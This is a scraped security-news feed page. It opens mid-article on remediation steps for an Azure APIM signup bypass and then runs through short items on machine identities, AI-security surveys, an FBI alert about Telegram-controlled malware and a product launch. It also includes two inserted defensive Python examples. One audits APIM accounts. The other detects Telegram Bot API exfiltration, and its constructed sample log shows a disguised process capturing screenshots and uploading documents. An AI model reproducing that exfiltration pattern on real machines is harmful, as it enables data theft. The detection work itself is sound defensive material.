Switch to Azure AD (Entra ID) as the sole identity provider.</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-d41523e e-con-full e-flex e-con e-parent" data-id="d41523e" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-1a389e9 elementor-widget elementor-widget-text-editor" data-id="1a389e9" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>Azure AD authentication ties account creation to your organization’s directory. Cross-tenant signups are not possible because users must authenticate through your tenant’s identity system. This is the long-term architectural fix. Learn more about <a href="https://learn.microsoft.com/en-us/azure/api-management/api-management-howto-aad">configuring Azure AD as an identity provider for APIM</a>.</p> <p> </p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-0e1caac e-con-full e-flex e-con e-parent" data-id="0e1caac" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-1537899 elementor-widget elementor-widget-heading" data-id="1537899" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">3. 
Require admin approval for all product subscriptions.</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-dca0e3a e-con-full e-flex e-con e-parent" data-id="dca0e3a" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-f497d51 elementor-widget elementor-widget-text-editor" data-id="f497d51" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>Even if you cannot immediately remove Basic Auth, setting approvalRequired: true on every product prevents attackers from self-subscribing and obtaining API keys. The attacker can create an account, but cannot obtain API keys without administrator approval.</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-f100636 e-con-full e-flex e-con e-parent" data-id="f100636" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-b272011 elementor-widget elementor-widget-image" data-id="b272011" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <img loading="lazy" decoding="async" width="960" height="204" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-set-approval-re-1.webp" class="attachment-full size-full wp-image-10964" alt="Terminal window showing Azure CLI command to set approval required on Starter product using PATCH method with JSON body" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-set-approval-re-1.webp 960w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-set-approval-re-1-300x64.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-set-approval-re-1-768x163.webp 768w" 
sizes="auto, (max-width: 960px) 100vw, 960px"> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-150642a e-con-full e-flex e-con e-parent" data-id="150642a" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-0342996 elementor-widget elementor-widget-heading" data-id="0342996" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">4. Audit existing developer portal accounts.</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-bfec1db e-con-full e-flex e-con e-parent" data-id="bfec1db" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-ba1b348 elementor-widget elementor-widget-text-editor" data-id="ba1b348" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>Look for accounts that were created after you “disabled” signup. Check for accounts using external email domains or accounts created via the Basic identity provider. 
Remove any unauthorized accounts and revoke their subscription keys.</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-8513f4e e-con-full e-flex e-con e-parent" data-id="8513f4e" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-7a90143 elementor-widget elementor-widget-image" data-id="7a90143" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <img loading="lazy" decoding="async" width="960" height="244" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-list-developer-1-1.webp" class="attachment-full size-full wp-image-10965" alt="Terminal window showing Azure CLI command to list developer portal users with Basic authentication, displaying API endpoint URL" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-list-developer-1-1.webp 960w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-list-developer-1-1-300x76.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-list-developer-1-1-768x195.webp 768w" sizes="auto, (max-width: 960px) 100vw, 960px"> </div> </div> </div><p>The post <a href="https://www.praetorian.com/blog/azure-apim-signup-bypass/">Azure APIM Signup Bypass: 97.9% of Developer Portals Still Exploitable Anonymously and from the Internet</a> appeared first on <a href="https://www.praetorian.com/">Praetorian</a>.</p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.praetorian.com/blog/">Offensive Security Blog: Latest Trends in Hacking | Praetorian</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by n8n-publisher">n8n-publisher</a>. Read the original post at: <a href="https://www.praetorian.com/blog/azure-apim-signup-bypass/">https://www.praetorian.com/blog/azure-apim-signup-bypass/</a> </p>
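The remediation steps above show the audit only as Azure CLI screenshots. As an added example that is not Praetorian's code, the Python script below checks steps 3 and 4 offline against JSON of the shape the ARM REST API returns for an API Management service's `products` and `users` collections: it lists published products that can be self-subscribed without approval, and Basic-provider accounts registered after signup was "disabled" or using an email domain you do not own. The field names and the `az rest` URL pattern are assumptions from my reading of the ARM schema, and the sample documents are constructed.

```python
"""Offline audit for APIM remediation steps 3 and 4 (added example, not Praetorian's code).

Input is JSON in the shape the ARM REST API returns for an API Management
service's `products` and `users` collections: a {"value": [...]} envelope whose
items carry a `name` and a `properties` object. The field names used below
(state, subscriptionRequired, approvalRequired, email, registrationDate,
identities[].provider) follow the ProductContract/UserContract schemas as I
understand them and are an assumption. To audit a real instance, save the
output of a GET against the (assumed) ARM path and load it in place of the
constructed samples, e.g.:
  https://management.azure.com/subscriptions/<SUB>/resourceGroups/<RG>/providers/Microsoft.ApiManagement/service/<APIM>/users?api-version=2022-08-01
"""
from __future__ import annotations

import json
from dataclasses import dataclass
from datetime import datetime, timezone


@dataclass(frozen=True)
class Finding:
    kind: str      # "product-self-subscribe" or "user-basic-signup"
    resource: str  # ARM resource name (product id or user id)
    detail: str


def _parse_arm_time(value: str) -> datetime:
    """ARM timestamps end in 'Z'; fromisoformat on older Pythons needs '+00:00'."""
    return datetime.fromisoformat(value.replace("Z", "+00:00")).astimezone(timezone.utc)


def find_self_subscribable_products(products: dict) -> list[Finding]:
    """Step 3: published products that hand out a subscription key without admin approval.
    These are exactly the products a self-registered account could obtain keys for."""
    findings: list[Finding] = []
    for product in products.get("value", []):
        props = product.get("properties", {})
        if props.get("state") != "published":
            continue  # unpublished products are not visible to portal users
        if props.get("subscriptionRequired", True) and not props.get("approvalRequired", False):
            findings.append(Finding(
                "product-self-subscribe", product["name"],
                f"{props.get('displayName', product['name'])}: approvalRequired is false",
            ))
    return findings


def find_basic_signups(users: dict, cutoff: datetime, allowed_domains: set[str]) -> list[Finding]:
    """Step 4: accounts created through the Basic (username/password) provider that were
    registered after signup was 'disabled' or that use an email domain you do not own."""
    findings: list[Finding] = []
    for user in users.get("value", []):
        props = user.get("properties", {})
        providers = {ident.get("provider", "").lower() for ident in props.get("identities", [])}
        if "basic" not in providers:
            continue  # directory-backed accounts are out of scope for this check
        email = props.get("email", "")
        domain = email.rpartition("@")[2].lower()
        registered = _parse_arm_time(props["registrationDate"]) if props.get("registrationDate") else None
        reasons = []
        if registered is not None and registered > cutoff:
            reasons.append(f"registered {registered.date()} after signup was disabled")
        if domain not in allowed_domains:
            reasons.append(f"external domain {domain or '<none>'}")
        if reasons:
            findings.append(Finding("user-basic-signup", user["name"], f"{email}: " + "; ".join(reasons)))
    return findings


# Constructed sample responses (not captured from any real instance).
SAMPLE_PRODUCTS = json.loads("""{"value": [
  {"name": "starter",   "properties": {"displayName": "Starter",   "state": "published",
   "subscriptionRequired": true, "approvalRequired": false}},
  {"name": "unlimited", "properties": {"displayName": "Unlimited", "state": "published",
   "subscriptionRequired": true, "approvalRequired": true}},
  {"name": "legacy",    "properties": {"displayName": "Legacy",    "state": "notPublished",
   "subscriptionRequired": true, "approvalRequired": false}}
]}""")

SAMPLE_USERS = json.loads("""{"value": [
  {"name": "1",    "properties": {"email": "admin@contoso.com",   "registrationDate": "2024-02-01T09:00:00Z",
   "identities": [{"provider": "Azure", "id": "1"}]}},
  {"name": "5f3a", "properties": {"email": "dev@contoso.com",     "registrationDate": "2025-06-10T12:00:00Z",
   "identities": [{"provider": "Basic", "id": "dev@contoso.com"}]}},
  {"name": "9c1e", "properties": {"email": "someone@example.net", "registrationDate": "2026-01-15T03:21:00Z",
   "identities": [{"provider": "Basic", "id": "someone@example.net"}]}}
]}""")

# Constructed: the day this hypothetical tenant flipped the portal's "disable signup" toggle.
SIGNUP_DISABLED_AT = datetime(2025, 11, 1, tzinfo=timezone.utc)


def audit(products: dict = SAMPLE_PRODUCTS, users: dict = SAMPLE_USERS,
          cutoff: datetime = SIGNUP_DISABLED_AT,
          allowed_domains: set[str] = frozenset({"contoso.com"})) -> list[Finding]:
    """Run both checks and return every finding; empty means steps 3 and 4 look clean."""
    return find_self_subscribable_products(products) + find_basic_signups(users, cutoff, allowed_domains)


if __name__ == "__main__":
    for finding in audit():
        print(f"[{finding.kind}] {finding.resource}: {finding.detail}")
```

On the constructed samples this flags the Starter product and the example.net account only; the contoso.com Basic account registered before the cutoff passes.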

How do Non-Human Identities manage access?

  • None
  • Published date: 2026-03-24 00:00:00

None

<h2>Are You Overlooking the Crucial Role of Non-Human Identities in Access Management?</h2><p>Managing Non-Human Identities (NHIs) is no longer a luxury but a necessity for robust cybersecurity. NHIs are machine identities, and they are pivotal in maintaining the security of automated systems. The growing reliance on technology across industries makes understanding them essential. But how exactly do NHIs manage access, and why should your organization care?</p><h3>Understanding the Essence of Non-Human Identities</h3><p>A Non-Human Identity is a machine identity created by combining a “Secret” (an encrypted password, token, or key) with the permissions granted by destination servers. Think of it as a tourist and their passport: the identity is the tourist, while the secret serves as the passport that grants access to different systems.</p><p>NHIs become crucial in environments that rely heavily on automation, particularly in sectors like financial services, healthcare, travel, and DevOps. As organizations increasingly transition to cloud-centric operations, the demand for effective NHI management escalates, and the absence of such oversight creates significant security gaps.</p><h3>Bridging the Gap: Security and R&amp;D Teams</h3><p>One of the perennial challenges organizations face is the disconnect between security and Research &amp; Development (R&amp;D) teams. This gap often leads to vulnerabilities that malicious actors can readily exploit. Comprehensive management of NHIs offers a cohesive strategy for a seamless and secure cloud environment; by providing end-to-end protection, it helps bridge these gaps.</p><h3>Lifecycle Management in NHI</h3><p>Effective NHI management pays meticulous attention to every stage of the lifecycle, from discovery and classification to threat detection and remediation. 
Such an approach contrasts significantly with point solutions like secret scanners, which offer a narrow field of protection.</p><ul> <li><strong>Discovery and Classification:</strong> Identifying and categorizing NHIs is the foundational step in establishing secure systems.</li> <li><strong>Threat Detection:</strong> Monitoring the NHIs’ behaviors within systems is crucial for detecting any anomalies or potential threats to security.</li> <li><strong>Remediation:</strong> Prompt actions based on identified threats help mitigate risks efficiently.</li> </ul><p>Understanding the entire lifecycle facilitates a context-aware security practice, offering insights into ownership, permissions, usage patterns, and potential vulnerabilities.</p><h3>Benefits of Implementing NHI Management</h3><p>Organizations committed to NHI management experience several significant advantages:</p><ul> <li><strong>Reduced Risk:</strong> Proactively mitigating security threats decreases the likelihood of breaches and data leaks.</li> <li><strong>Improved Compliance:</strong> By meeting regulatory requirements through policy enforcement and audit trails, businesses adhere to necessary compliance standards.</li> <li><strong>Increased Efficiency:</strong> Automating NHIs and secrets management allows security teams to concentrate on strategic initiatives.</li> <li><strong>Enhanced Visibility and Control:</strong> A centralized view for access management and governance empowers organizations with better security oversight.</li> <li><strong>Cost Savings:</strong> Automating secrets rotation and decommissioning NHIs significantly reduces operational costs.</li> </ul><h3>Insights into Industry Relevance</h3><p>Given the diverse range of industries relying on cloud technology, from healthcare to travel, the relevance of NHI management cannot be overstated. For DevOps and Security Operations Center (SOC) teams, efficient NHI management optimizes operations and safeguards against potential threats. 
Such practices translate into not just compliance and security but also a dependable operational framework that withstands the test of time.</p><p>For more on how <a href="https://entro.security/blog/harnessing-ai-in-ima-and-am/">harnessing AI in Identity and Access Management (IAM) and Access Management (AM)</a> can complement NHI management, explore strategies that lead to a stronger security posture.</p><h3>Building a Secure Cloud Environment</h3><p>The cloud has become the backbone of modern operations, transforming how businesses innovate and serve their clients. However, this transition demands a renewed focus on security. NHIs play a pivotal role, addressing prevalent security gaps and facilitating a secure cloud environment. This aligns with <a href="https://entro.security/blog/just-in-time-access-role-in-non-human-identities-access-management/">Just-in-Time access in Non-Human Identities access management</a> to ensure timely and secured permissions.</p><p>The strategic significance of NHI management becomes evident once machine identities are treated as a core part of the cybersecurity program. Interested in a deeper dive on how this strategic approach aligns with zero trust principles? See the discussion on <a href="https://entro.security/blog/the-role-of-secrets-management-in-zero-trust-architecture/">the role of secrets management in Zero Trust Architecture</a>.</p><p>By taking a holistic view of NHI management, organizations not only protect their systems but also create an agile infrastructure capable of adapting to evolving threats. This approach represents a forward-thinking paradigm, empowering businesses to navigate the complexities of cybersecurity with confidence.</p><h3>Why Are Non-Human Identities Essential for Cloud Security?</h3><p>Have you ever considered how cloud security would function without proper oversight of Non-Human Identities (NHIs)? 
When organizations shift more of their operations to the cloud, they encounter an equally significant shift in focus towards safeguarding these machine identities. NHIs include encrypted passwords, tokens, and keys that act as machine credentials, allowing machines to authenticate to one another and communicate securely and efficiently. When managed correctly, they provide a robust line of defense against unauthorized access and potential breaches.</p><p>Mismanagement or neglect of NHIs can severely compromise security, expose sensitive data, and even bring operations to a standstill. Ineffective NHI management has consequences that ripple through every level of an enterprise’s architecture, highlighting the essential role these identities play in digital operations. These challenges elevate the importance of adopting a comprehensive approach to NHI management so that organizations can fortify their cloud-based operations.</p><h3>Real-world Implications and Industry Challenges</h3><p>In industries like financial services and healthcare, where sensitive data is abundant, the proper management of NHIs is crucial. These sectors routinely handle large volumes of sensitive information, from financial transactions to personal health records, making them prime targets for cyberattacks. In these fields, an improperly managed machine identity can open the door to devastating breaches.</p><p>Across various industries and teams, such as travel, DevOps, and SOC teams, the common thread of concern is automating processes while maintaining security. Cloud technology brings unprecedented scalability and operational efficiency, but it also creates unique challenges. Companies need to integrate NHI management as a cornerstone of their cybersecurity strategy, balancing this advancement with stringent security measures.</p><h3>Keeping Pace with Technical Advances</h3><p>Is your organization keeping pace with the latest advancements in NHI management? 
Behavioral analytics and machine learning, for instance, play a vital role in enhancing NHI oversight. These technologies help create advanced systems that predict and alert to abnormal behavior based on historic data patterns. Such sophistication supports a proactive security posture, catching potential threats before they manifest into full-fledged attacks.</p><p>Moreover, implementing multi-factor authentication (MFA) for machines, much like humans, adds an extra layer of security. MFA ensures that even if a machine’s “passport” or identity gets compromised, unauthorized entities cannot easily exploit system access. For insights on implementing these protocols, explore the detailed guidelines outlined in <a href="https://entro.security/blog/implementing-nhi-security-protocols/">Implementing NHI Security Protocols</a>.</p><h3>Automation: The Double-Edged Sword</h3><p>While automation contributes to efficiency and scalability, it inherently carries risks if not meticulously managed. Automating the lifecycle of NHIs—ensuring timely updates, permissions adjustments, and decommissioning—reduces the chances of security lapses. Yet, the failure to update and rotate secrets promptly could lead to vulnerabilities. This emphasizes the importance of comprehensive automation strategies to mitigate risk, as highlighted in <a href="https://entro.security/blog/how-cisos-should-prepare-for-2025/">how CISOs should prepare for 2025</a>.</p><p>Meanwhile, those involved in DevOps face parallel challenges. The speed and agility provided by DevOps necessitate machine identities to seamlessly interconnect various components within cloud infrastructure. NHI management must therefore align with DevOps methodologies, ensuring that systems are both agile and secure.</p><h3>Segmentation and Access Control</h3><p>A robust NHI management strategy necessitates precise segmentation and access control. 
Segmenting machine identities helps compartmentalize access and limits the scope of potential breaches. As NHIs communicate between applications, databases, and scripts, defining access parameters based on roles ensures that machines execute only what they are permitted to, preventing overreach and misuse.</p><p>In developing these frameworks, organizations gain enhanced oversight into machine communications and workflows. Such insights aid in identifying and sealing security loopholes, creating fortified, yet flexible, security postures.</p><h3>New Possibilities with Artificial Intelligence</h3><p>Are you leveraging AI to optimize NHI management in your organization? Artificial intelligence introduces new ways of managing NHIs by automating the detection of anomalies and proposing remediation actions. AI’s predictive modeling capabilities offer insights into access behaviors and patterns, helping refine security procedures. For more information on integrating AI into Identity Access Management, explore <a href="https://entro.security/blog/non-human-identity-security-in-saas/">Non-Human Identity Security in SaaS</a>.</p><p>Integrating AI into managing machine identities ensures a dynamic response to emerging threats, enhancing the ability to neutralize them swiftly. This merging of AI with NHI systems represents a pivotal evolution in cybersecurity dynamics.</p><p>In summary, as digital environments become progressively complex, Non-Human Identity and secrets management remains a pivotal component. Building and maintaining a secure cloud environment requires a concerted focus on managing these machine identities at each stage of their lifecycle. By aligning various departmental security policies and leveraging technological advancements like AI, progressive organizations will ensure robust and enduring protection across their cloud environments. 
With these strategies in place, businesses can boost their resilience against escalating cybersecurity threats and drive innovation, knowing their core operations remain secure.</p><p>The post <a href="https://entro.security/how-do-non-human-identities-manage-access/">How do Non-Human Identities manage access?</a> appeared first on <a href="https://entro.security/">Entro</a>.</p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://entro.security/">Entro</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Alison Mack">Alison Mack</a>. Read the original post at: <a href="https://entro.security/how-do-non-human-identities-manage-access/">https://entro.security/how-do-non-human-identities-manage-access/</a> </p>

What does “AI security” mean and why does it matter to your business?

  • None
  • Published date: 2026-03-24 00:00:00

Let's imagine a customer-support chatbot—it's running on Red Hat OpenShift AI and searches internal documents to answer questions. A user asks it a common question, but the chatbot inadvertently retrieves a malicious document that contains hidden instructions…

Utimaco Survey: 78% of US Companies Say Data Breaches Are the Top GenAI Risk, But Most Haven’t Acted

  • None
  • Published date: 2026-03-24 00:00:00

None

<p>Companies know they have a problem with generative AI and quantum security. They just haven’t done much about it yet.</p><p>That’s the upshot of Utimaco’s 2026 Digital Trust Report, a commissioned study of 250 large U.S. companies released at RSAC 2026. The research, conducted by 451 Research from S&amp;P Global, exposes a stark gap between awareness and action across both AI and quantum security.</p><p>On the AI side, 78% of respondents said data breaches are the greatest risk associated with generative AI that must be addressed in the next 12 months. Close behind: 77% flagged intellectual property theft as a top concern. Yet more than half (57%) have not yet implemented any countermeasures. Over 90% say AI is used in daily production operations, and nearly two-thirds report running hybrid IT infrastructure with strategic public cloud workloads. So the exposure is real and widespread; the response is not.</p><p>The quantum findings are even more striking. Seventy-two percent of respondents identified attacks on legacy data as the biggest quantum security risk, pointing specifically to “harvest now, decrypt later” (HNDL) attacks, where adversaries collect encrypted data today with the intent to decrypt it once quantum computing matures. Despite that recognition, 75% have not implemented a corresponding solution. Only 23% have deployed anything to address HNDL.</p><p>Data sovereignty rounded out the findings. Eighty percent of respondents rated protecting customer data as “very” or “critically” important, even as the U.S. lacks a national privacy law equivalent to GDPR. The report notes that sovereignty has become a genuinely global concern regardless of local regulatory requirements.</p><p>“Given the new risks posed by technologies such as AI and quantum computing, data protection and data security require strategic measures,” said Tina Stewart, CMO at Utimaco. 
“Developing a long-term encryption strategy provides the necessary flexibility to address current data protection threats to AI and future risks posed by quantum computing.”</p><p>451 Research analyst Justin Lam put it plainly: “The tension between enterprise risk and readiness is real.”</p><p>Utimaco makes hardware security modules and key management solutions for on-premises and cloud environments. The full 2026 Digital Trust Report is available for download from Utimaco’s website.</p>

CSA and Aembit Survey: 68% of Organizations Can’t Distinguish AI Agent Actions from Human Activity

  • None
  • Published date: 2026-03-24 00:00:00

None

<p>AI agents are already deployed broadly across enterprise environments. The problem is that organizations can’t tell what they’re doing.</p><p>That’s the core finding of a new survey report released at RSAC 2026 by the Cloud Security Alliance, commissioned by Aembit. The “Identity and Access Gaps in the Age of Autonomous AI” report surveyed 228 IT and security professionals in January 2026 and found that identity governance for AI agents is, in most organizations, essentially improvised.</p><p>The headline number: 68% of organizations cannot clearly distinguish between human and AI agent activity, even as 73% expect AI agents to become vital to their operations within the next year. Eighty-five percent say AI agents are already running in production environments, across task automation (67%), research (52%), developer assistance (50%), and security monitoring (50%). In other words, these agents are doing real work inside real systems with real access, and most organizations lack the controls to attribute their actions.</p><p>The identity situation is particularly fragmented. Fifty-two percent of organizations use workload identities for agents, 43% rely on shared service accounts, and 31% allow agents to operate under human user identities. Nearly three-quarters (74%) say agents often receive more access than necessary. Seventy-nine percent believe agents create new access pathways that are difficult to monitor. Only 22% report that access frameworks are applied “very consistently” to AI agents.</p><p>Ownership is scattered too: 28% say security leads responsibility, followed by development and engineering (21%) and IT (19%). Only 9% point to IAM teams.</p><p>“AI agents are inheriting human permissions, operating under shared accounts, and expanding the attack surface in ways that existing IAM tools weren’t designed to handle,” said David Goldschlag, co-founder and CEO of Aembit. 
“Agentic autonomy without identity-level access controls is a risk organizations can’t afford to ignore.”</p><p>Hillary Baron, AVP of Research at CSA, added that existing IAM approaches “were not designed for autonomous agents and are showing strain as deployments scale.”</p><p>The full report is available from the Cloud Security Alliance. Aembit is a non-human identity and access management platform backed by $45 million in total funding.</p>

Intuitions for Transformer Circuits

  • Connor Davis
  • Published date: 2026-03-23 01:06:35

A mental model for addressing the residual stream

In a previous post on language modeling, I implemented a GPT-style transformer. Lately I've been learning mechanistic interpretability to go deeper and understand why the transformer works on a mathem… [+20487 chars]

FBI Warns of Handala Hackers Using Telegram in Malware Attacks

  • None
  • Published date: 2026-03-23 00:00:00

None

<h2><b>What happened</b></h2><p class="p3">The <span class="s2">FBI</span> issued a warning that Iran-linked hackers tied to the country’s <span class="s2">Ministry of Intelligence and Security (MOIS)</span> are using <span class="s2">Telegram</span> as command-and-control infrastructure in malware campaigns. The activity has been attributed to the <span class="s2">Handala</span> hacktivist group and related state-linked actors, who are targeting journalists, dissidents, and opposition groups worldwide. According to the alert, attackers rely on social engineering to infect victims with <span class="s2">Windows-based malware</span>, which is then used to exfiltrate files and screenshots from compromised systems. The FBI said the campaigns are part of broader “hack-and-leak” operations aimed at intelligence collection and reputational damage amid heightened geopolitical tensions.</p><h2><b>Who is affected</b></h2><p class="p3">Journalists, political dissidents, and individuals critical of the Iranian government are primarily affected, along with organizations and individuals globally who may be targeted through similar malware delivery tactics.</p><h2><b>Why CISOs should care</b></h2><p class="p3">The campaign shows how attackers are increasingly leveraging widely used messaging platforms like Telegram as covert infrastructure for malware operations, blending social engineering with command-and-control activity.</p><h2><b>3 practical actions</b></h2><ol> <li class="p3"><span class="s2"><b>Monitor messaging platforms for abuse.</b></span> Watch for suspicious links, files, or communications originating from Telegram-based channels.</li> <li class="p3"><span class="s2"><b>Harden defenses against social engineering.</b></span> The attacks rely on tricking users into executing malware rather than exploiting software flaws.</li> <li class="p3"><span class="s2"><b>Detect data exfiltration behavior.</b></span> Monitor for unusual file transfers or screenshot capture activity on endpoints.</li> </ol><p class="p3"><i>For more coverage of large-scale incidents and threat activity, explore our reporting on </i><a href="https://cisowhisperer.com/tag/cyberattack/"><span class="s2"><b><i>Cyberattacks</i></b></span></a><i>.</i></p><p>The post <a rel="nofollow" href="https://cisowhisperer.com/fbi-warns-of-handala-hackers-using-telegram-in-malware-attacks/">FBI Warns of Handala Hackers Using Telegram in Malware Attacks</a> appeared first on <a rel="nofollow" href="https://cisowhisperer.com/">CISO Whisperer</a>.</p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://cisowhisperer.com">CISO Whisperer</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Evan Rowe">Evan Rowe</a>. Read the original post at: <a href="https://cisowhisperer.com/fbi-warns-of-handala-hackers-using-telegram-in-malware-attacks/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=fbi-warns-of-handala-hackers-using-telegram-in-malware-attacks">https://cisowhisperer.com/fbi-warns-of-handala-hackers-using-telegram-in-malware-attacks/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=fbi-warns-of-handala-hackers-using-telegram-in-malware-attacks</a> </p>
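An added detection example for the third practical action above (it is not part of the CISO Whisperer post): it correlates Telegram Bot API upload calls from processes outside a site's messaging-client baseline with screenshot capture or bulk file reads shortly before them. The telemetry format, host names, process names and the allowed-client baseline are constructed for this example; only the Telegram API host and Bot API method names are real.

```python
"""Constructed endpoint telemetry, one event per line:
   ISO-time|host|pid|process|event_type|detail
event_type is one of net_http, screenshot_capture, bulk_file_read."""
from collections import defaultdict
from datetime import datetime, timedelta

# Bot API methods that move content off the host (public Telegram Bot API names).
UPLOAD_METHODS = {"sendDocument", "sendPhoto", "sendVideo", "sendMediaGroup"}
TELEGRAM_API_HOSTS = {"api.telegram.org"}
# Assumed site baseline: processes that legitimately reach Telegram on a workstation.
KNOWN_MESSAGING_CLIENTS = {"telegram.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
COLLECTION_EVENTS = {"screenshot_capture", "bulk_file_read"}
WINDOW = timedelta(minutes=10)  # collection must precede the first upload by at most this

# Constructed sample log; <TOKEN> stands in for the bot token that normally sits in the path.
SAMPLE_LOG = """\
2026-03-20T09:01:12|WS-104|4412|chrome.exe|net_http|api.telegram.org /bot<TOKEN>/getUpdates
2026-03-20T09:03:40|WS-104|5120|winhlp_update.exe|screenshot_capture|BitBlt 1920x1080
2026-03-20T09:03:41|WS-104|5120|winhlp_update.exe|bulk_file_read|C:\\Users\\j.doe\\Documents (137 files)
2026-03-20T09:04:05|WS-104|5120|winhlp_update.exe|net_http|api.telegram.org /bot<TOKEN>/sendDocument
2026-03-20T09:05:00|WS-104|5120|winhlp_update.exe|net_http|api.telegram.org /bot<TOKEN>/sendPhoto
2026-03-20T09:10:00|WS-104|4412|chrome.exe|net_http|api.telegram.org /bot<TOKEN>/sendDocument
2026-03-20T10:00:00|WS-104|6001|backup.exe|net_http|api.telegram.org /bot<TOKEN>/sendDocument
"""


def parse_event(line):
    """Split one telemetry line into a dict; detail may itself contain spaces."""
    ts, host, pid, proc, etype, detail = line.rstrip("\n").split("|", 5)
    return {"ts": datetime.fromisoformat(ts), "host": host, "pid": int(pid),
            "process": proc.lower(), "type": etype, "detail": detail}


def telegram_upload(event):
    """True if the event is an HTTP request to a Telegram Bot API upload method."""
    if event["type"] != "net_http":
        return False
    host, _, path = event["detail"].partition(" ")
    return host in TELEGRAM_API_HOSTS and path.rsplit("/", 1)[-1] in UPLOAD_METHODS


def find_exfil(lines):
    """Return one alert per process that uploads to Telegram and is not a known client.

    Severity is 'high' when screenshot or bulk-read activity from the same process
    fell inside WINDOW before its first upload, otherwise 'medium'."""
    by_proc = defaultdict(list)
    for line in lines:
        if line.strip():
            ev = parse_event(line)
            by_proc[(ev["host"], ev["pid"], ev["process"])].append(ev)
    alerts = []
    for (host, pid, proc), events in by_proc.items():
        if proc in KNOWN_MESSAGING_CLIENTS:
            continue
        uploads = [e for e in events if telegram_upload(e)]
        if not uploads:
            continue
        first_upload = min(e["ts"] for e in uploads)
        collection = sorted({e["type"] for e in events
                             if e["type"] in COLLECTION_EVENTS
                             and first_upload - WINDOW <= e["ts"] <= first_upload})
        alerts.append({"host": host, "pid": pid, "process": proc,
                       "uploads": len(uploads), "collection": collection,
                       "severity": "high" if collection else "medium"})
    return alerts


if __name__ == "__main__":
    for alert in find_exfil(SAMPLE_LOG.splitlines()):
        print(alert)
```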

Datadog Launches AI Security Agent to Combat Machine-Speed Cyberattacks

  • Jon Swartz
  • Published date: 2026-03-23 00:00:00

None

<p>SAN FRANCISCO – Datadog Inc. on Monday <a href="https://www.globenewswire.com/news-release/2026/03/23/3260461/0/en/Bits-AI-Security-Analyst-Reduces-Threat-Investigation-Time-by-up-to-98.html">announced</a> general availability of its Bits AI Security Analyst, a move designed to transform how security teams handle the overwhelming surge of digital threats.</p><p>Integrated directly into Datadog’s Cloud SIEM (Security Information and Event Management), the new AI agent aims to solve a critical bottleneck in the Security Operations Center (SOC). By autonomously investigating alerts, Bits AI can reportedly condense complex investigations that traditionally take human analysts hours into as little as 30 seconds.</p><p>Modern security teams are currently caught in a pincer movement: a global talent shortage on one side, and the rise of agentic-powered AI attacks on the other. According to Datadog, the sheer volume of data makes it nearly impossible for human teams to triage every threat manually.</p><p>“Traditional SIEMs are leaving enterprises increasingly exposed because queues keep growing and investigations take longer to correlate,” said Tim Knudsen, vice president of security products at Datadog. He noted that Bits AI leverages observability signals to provide “fully explained verdicts,” allowing human teams to focus on high-impact defense rather than manual data sorting.</p><p>Datadog claims that Bits AI functions as an “always-on senior SOC analyst,” offering several operational advantages: rapid resolution, which reduces the mean-time-to-resolution (MTTR) by more than 90%; unified visibility, which aggregates data across clouds, identities, and endpoint detection and response (EDR) systems; and enterprise scaling, with built-in security controls such as Role-Based Access Control (RBAC) that ensure the AI operates within corporate governance frameworks.</p><p>The launch at RSAC 2026 here signals a shift toward autonomous security operations. As GenAI attacks intensify, Datadog Chief Product Officer Yanbing Li emphasized that “intelligent, autonomous systems” are no longer optional for Fortune 500 companies.</p><p>Bits AI Security Analyst is available to all Datadog customers.</p>

Automated Cryptographic Agility Frameworks for AI Resource Orchestration

  • None
  • Published date: 2026-03-23 00:00:00

None

